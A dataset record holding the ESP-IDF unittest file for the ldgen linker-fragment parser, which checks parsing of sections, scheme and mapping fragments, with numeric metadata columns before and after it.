| 28.430769 | 114 | 0.729437 | 201 | 1,848 | 6.482587 | 0.218905 | 0.204144 | 0.110514 | 0.064467 | 0.725249 | 0.725249 | 0.725249 | 0.725249 | 0.725249 | 0.725249 | 0 | 0.016835 | 0.196429 | 1,848 | 64 | 115 | 28.875 | 0.860606 | 0.011364 | 0 | 0.790698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.186047 | false | 0 | 0.116279 | 0.093023 | 0.674419 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
169af566a2b0589304b366b919da497d2992c7e2 | 27,058 | py | Python | tools/ldgen/test/test_fragments.py | smartsnow/esp-idf | 6e776946d01ec0d081d09000c36d23ec1d318c06 | [
"Apache-2.0"
] | null | null | null | tools/ldgen/test/test_fragments.py | smartsnow/esp-idf | 6e776946d01ec0d081d09000c36d23ec1d318c06 | [
"Apache-2.0"
] | null | null | null | tools/ldgen/test/test_fragments.py | smartsnow/esp-idf | 6e776946d01ec0d081d09000c36d23ec1d318c06 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright 2018-2019 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import unittest
from io import StringIO
from pyparsing import ParseException, ParseFatalException, Word, alphanums
try:
from fragments import FRAGMENT_TYPES, Fragment, FragmentFile, KeyGrammar
from sdkconfig import SDKConfig
except ImportError:
sys.path.append('../')
from fragments import FRAGMENT_TYPES, Fragment, FragmentFile, KeyGrammar
from sdkconfig import SDKConfig
class SampleFragment(Fragment):
grammars = {
'key_1': KeyGrammar(Word(alphanums + '_').setResultsName('value'), 0, None, True),
'key_2': KeyGrammar(Word(alphanums + '_').setResultsName('value'), 0, None, False),
'key_3': KeyGrammar(Word(alphanums + '_').setResultsName('value'), 3, 5, False)
}
def set_key_value(self, key, parse_results):
if key == 'key_1':
self.key_1 = list()
for result in parse_results:
self.key_1.append(result['value'])
elif key == 'key_2':
self.key_2 = list()
for result in parse_results:
self.key_2.append(result['value'])
def get_key_grammars(self):
return self.__class__.grammars
FRAGMENT_TYPES['test'] = SampleFragment
class FragmentTest(unittest.TestCase):
def setUp(self):
with tempfile.NamedTemporaryFile(delete=False) as f:
self.kconfigs_source_file = os.path.join(tempfile.gettempdir(), f.name)
with tempfile.NamedTemporaryFile(delete=False) as f:
self.kconfig_projbuilds_source_file = os.path.join(tempfile.gettempdir(), f.name)
os.environ['COMPONENT_KCONFIGS_SOURCE_FILE'] = self.kconfigs_source_file
os.environ['COMPONENT_KCONFIGS_PROJBUILD_SOURCE_FILE'] = self.kconfig_projbuilds_source_file
os.environ['COMPONENT_KCONFIGS'] = ''
os.environ['COMPONENT_KCONFIGS_PROJBUILD'] = ''
# prepare_kconfig_files.py doesn't have to be called because COMPONENT_KCONFIGS and
# COMPONENT_KCONFIGS_PROJBUILD are empty
self.sdkconfig = SDKConfig('data/Kconfig', 'data/sdkconfig')
def tearDown(self):
try:
os.remove(self.kconfigs_source_file)
os.remove(self.kconfig_projbuilds_source_file)
except Exception:
pass
@staticmethod
def create_fragment_file(contents, name='test_fragment.lf'):
f = StringIO(contents)
f.name = name
return f
def test_basic(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_1
value_2 # comments should be ignored
value_3
# this is a comment as well
key_2: value_a
# this is the last comment
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(len(fragment_file.fragments[0].key_1), 3)
self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_2')
self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_3')
self.assertEqual(len(fragment_file.fragments[0].key_2), 1)
self.assertEqual(fragment_file.fragments[0].key_2[0], 'value_a')
def test_duplicate_keys(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1: value_1
key_1: value_a
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_empty_key(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_conditional(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_1
if A = y:
value_2
value_3
if A = n:
value_4
if B = n:
value_5
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_2')
self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_3')
self.assertEqual(fragment_file.fragments[0].key_1[3], 'value_5')
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_1
if B = y:
value_2
elif C = y:
value_3
elif A = y:
value_4
else:
value_5
value_6
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_3')
self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_6')
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_1
if A = y:
value_2
if B = y:
value_3
else:
value_4
if C = y:
value_5
value_6
value_7
key_2:
value_a
if B != y:
value_b
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_2')
self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_4')
self.assertEqual(fragment_file.fragments[0].key_1[3], 'value_5')
self.assertEqual(fragment_file.fragments[0].key_1[4], 'value_6')
self.assertEqual(fragment_file.fragments[0].key_1[5], 'value_7')
self.assertEqual(fragment_file.fragments[0].key_2[0], 'value_a')
self.assertEqual(fragment_file.fragments[0].key_2[1], 'value_b')
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
if A = n:
value_2
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(len(fragment_file.fragments[0].key_1), 0)
def test_empty_file(self):
test_fragment = self.create_fragment_file(u"""
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(len(fragment_file.fragments), 0)
def test_setting_indent(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_1
value_2
value_3
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(len(fragment_file.fragments[0].key_1), 3)
self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_2')
self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_3')
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_1
value_2 # first element dictates indent
value_3
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_values_num_limit(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_a
key_3:
value_1
value_2
value_3
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_a
key_3:
value_1
value_2
value_3
value_4
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(len(fragment_file.fragments), 1)
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_a
key_3:
value_1
value_2
value_3
value_4
value_5
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(len(fragment_file.fragments), 1)
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_a
key_3:
value_1
value_2
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_a
key_3:
value_1
value_2
value_3
value_4
value_5
value_6
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_unsupported_key(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
value_a
key_4:
value_1
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_empty_fragment(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_empty_conditional(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
if B = y:
else:
value_1
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
if B = y:
value_1
else B = y:
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
if B = y:
value_1
elif B = y:
else:
value_2
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_out_of_order_conditional(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
elif B = y:
value_1
else:
value_2
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
else:
value_2
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_required_keys(self):
test_fragment = self.create_fragment_file(u"""
[test:test]
key_2:
value_1
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_multiple_fragments(self):
test_fragment = self.create_fragment_file(u"""
[test:test1]
key_1:
value_1
[test:test2]
key_1:
value_2
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(len(fragment_file.fragments), 2)
self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
self.assertEqual(fragment_file.fragments[1].key_1[0], 'value_2')
def test_whole_conditional_fragment(self):
test_fragment = self.create_fragment_file(u"""
if B = y:
[test:test1]
key_1:
value_1
else:
[test:test2]
key_1:
value_2
if A = y:
[test:test3]
key_1:
value_3
if C = y:
value_6
[test:test4]
key_1:
value_4
[test:test5]
key_1:
value_5
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(len(fragment_file.fragments), 4)
self.assertEqual(fragment_file.fragments[0].name, 'test2')
self.assertEqual(fragment_file.fragments[1].name, 'test3')
self.assertEqual(fragment_file.fragments[1].key_1[1], 'value_6')
self.assertEqual(fragment_file.fragments[2].name, 'test4')
self.assertEqual(fragment_file.fragments[3].name, 'test5')
def test_equivalent_conditional_fragment(self):
test_fragment1 = self.create_fragment_file(u"""
if A = y:
[test:test1]
key_1:
value_1
else:
[test:test2]
key_1:
value_2
""")
fragment_file1 = FragmentFile(test_fragment1, self.sdkconfig)
self.assertEqual(len(fragment_file1.fragments), 1)
self.assertEqual(fragment_file1.fragments[0].key_1[0], 'value_1')
test_fragment2 = self.create_fragment_file(u"""
[test:test1]
key_1:
if A = y:
value_1
else:
value_2
""")
fragment_file2 = FragmentFile(test_fragment2, self.sdkconfig)
self.assertEqual(len(fragment_file2.fragments), 1)
self.assertEqual(fragment_file2.fragments[0].key_1[0], 'value_1')
class SectionsTest(FragmentTest):
def test_basic(self):
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
.section1
.section2
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].entries, {'.section1', '.section2'})
def test_duplicate_entries(self):
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
.section1
.section2
.section3
.section2
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].entries, {'.section1', '.section2', '.section3'})
def test_empty_entries(self):
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
if B = y:
.section1
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_entries_grammar(self):
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
_valid1
valid2.
.valid3_-
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].entries,
{'_valid1', 'valid2.', '.valid3_-'})
# invalid starting char
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
1invalid
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
-invalid
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
# + notation
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
valid+
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].entries,
{'valid+'})
test_fragment = self.create_fragment_file(u"""
[sections:test]
entries:
inva+lid+
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
class SchemeTest(FragmentTest):
def test_basic(self):
test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
sections1 -> target1
sections2 -> target2
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].entries,
{('sections1', 'target1'),
('sections2', 'target2')})
def test_duplicate_entries(self):
test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
sections1 -> target1
sections2 -> target2
sections2 -> target2
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(fragment_file.fragments[0].entries,
{('sections1', 'target1'),
('sections2', 'target2')})
def test_empty_entries(self):
test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
if B = y:
sections1 -> target1
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_improper_grammar(self):
test_fragment = self.create_fragment_file(u"""
[scheme:test]
entries:
sections1, target1 # improper separator
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
class MappingTest(FragmentTest):
def test_basic(self):
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj:symbol (noflash)
obj (noflash)
obj:symbol_2 (noflash)
obj_2 (noflash)
* (noflash)
""")
expected = {('obj', 'symbol', 'noflash'),
('obj', None, 'noflash'),
('obj', 'symbol_2', 'noflash'),
('obj_2', None, 'noflash'),
('*', None, 'noflash')}
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_archive(self):
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
entries:
* (default)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib1.a
lib2.a
entries:
* (default)
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
def test_empty_entries(self):
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib.a
entries:
if B = y:
* (noflash) # if condition is false, then no 'entries' key value
""")
expected = set()
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(expected, fragment_file.fragments[0].entries)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib.a
entries:
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_duplicate_entries(self):
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib.a
entries:
obj:symbol (noflash)
obj:symbol (noflash)
""")
expected = {('obj', 'symbol', 'noflash')}
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_invalid_grammar(self):
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive:
lib.a
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
entries:
* (default)
""")
with self.assertRaises(ParseFatalException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj: (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj: ()
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj:symbol
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
(noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
obj:* (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
:symbol (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
test_fragment = self.create_fragment_file(u"""
[mapping:test]
archive: lib.a
entries:
*:symbol (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
class DeprecatedMappingTest(FragmentTest):
def test_valid_grammar(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
obj:symbol (noflash)
# Comments should not matter
obj (noflash)
# Nor should whitespace
obj : symbol_2 ( noflash )
obj_2 ( noflash )
* (noflash)
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual('lib.a', fragment_file.fragments[0].archive)
self.assertEqual('lib_a', fragment_file.fragments[0].name)
expected = {('obj', 'symbol', 'noflash'),
('obj', None, 'noflash'),
('obj', 'symbol_2', 'noflash'),
('obj_2', None, 'noflash'),
('*', None, 'noflash')
}
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_explicit_blank_default_w_others(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: A = n
obj_a (noflash)
: default
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
expected = {('*', None, 'default')}
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_implicit_blank_default_w_others(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: A = n
obj_a (noflash)
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
expected = {('*', None, 'default')}
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_explicit_blank_default(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: default
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
expected = {('*', None, 'default')}
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_implicit_blank_default(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: default
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
expected = {('*', None, 'default')}
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_multiple_entries(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: A = n
obj_a1 (noflash)
obj_a2 (noflash)
: B = n
obj_b1 (noflash)
obj_b2 (noflash)
obj_b3 (noflash)
: C = n
obj_c1 (noflash)
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
expected = {('obj_b1', None, 'noflash'),
('obj_b2', None, 'noflash'),
('obj_b3', None, 'noflash')}
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_blank_entries(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: A = n
obj_a (noflash)
: B = n
: C = n
obj_c (noflash)
: default
obj (noflash)
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
expected = {('*', None, 'default')}
self.assertEqual(expected, fragment_file.fragments[0].entries)
def test_blank_first_condition(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
obj_a (noflash)
: CONFIG_B = y
obj_b (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_nonlast_default_1(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: default
obj_a (noflash)
: CONFIG_A = y
obj_A (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_nonlast_default_2(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: A = y
obj_A (noflash)
: default
obj_a (noflash)
: B = y
obj_B (noflash
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_nonlast_default_3(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: A = y
obj_A (noflash)
:
obj_a (noflash)
: B = y
obj_B (noflash
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_duplicate_default_1(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: CONFIG_A = y
obj_A (noflash)
: default
obj_a (noflash)
: CONFIG_B = y
obj_B (noflash)
: default
obj_a (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_duplicate_default_2(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: CONFIG_A = y
obj_A (noflash)
: CONFIG_B = y
obj_a (noflash)
: default
obj_B (noflash)
:
obj_a (noflash)
""")
with self.assertRaises(ParseException):
FragmentFile(test_fragment, self.sdkconfig)
def test_mixed_deprecated_mapping(self):
test_fragment = self.create_fragment_file(u"""
[mapping]
archive: lib.a
entries:
: A = n
obj_A (noflash)
: default
obj_B (noflash)
[mapping:test]
archive: lib.a
entries:
if A = n:
obj_A (noflash)
else:
obj_B (noflash)
""")
fragment_file = FragmentFile(test_fragment, self.sdkconfig)
self.assertEqual(2, len(fragment_file.fragments))
self.assertEqual(fragment_file.fragments[0].entries,
fragment_file.fragments[1].entries)
if __name__ == '__main__':
unittest.main()
| 25.574669 | 101 | 0.650344 | 3,206 | 27,058 | 5.248284 | 0.080786 | 0.113396 | 0.129324 | 0.091525 | 0.845299 | 0.823725 | 0.806252 | 0.782955 | 0.751099 | 0.720611 | 0 | 0.017983 | 0.233425 | 27,058 | 1,057 | 102 | 25.598865 | 0.793221 | 0.027829 | 0 | 0.800931 | 0 | 0 | 0.259996 | 0.003728 | 0 | 0 | 0 | 0 | 0.117579 | 1 | 0.054715 | false | 0.001164 | 0.012806 | 0.001164 | 0.077998 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.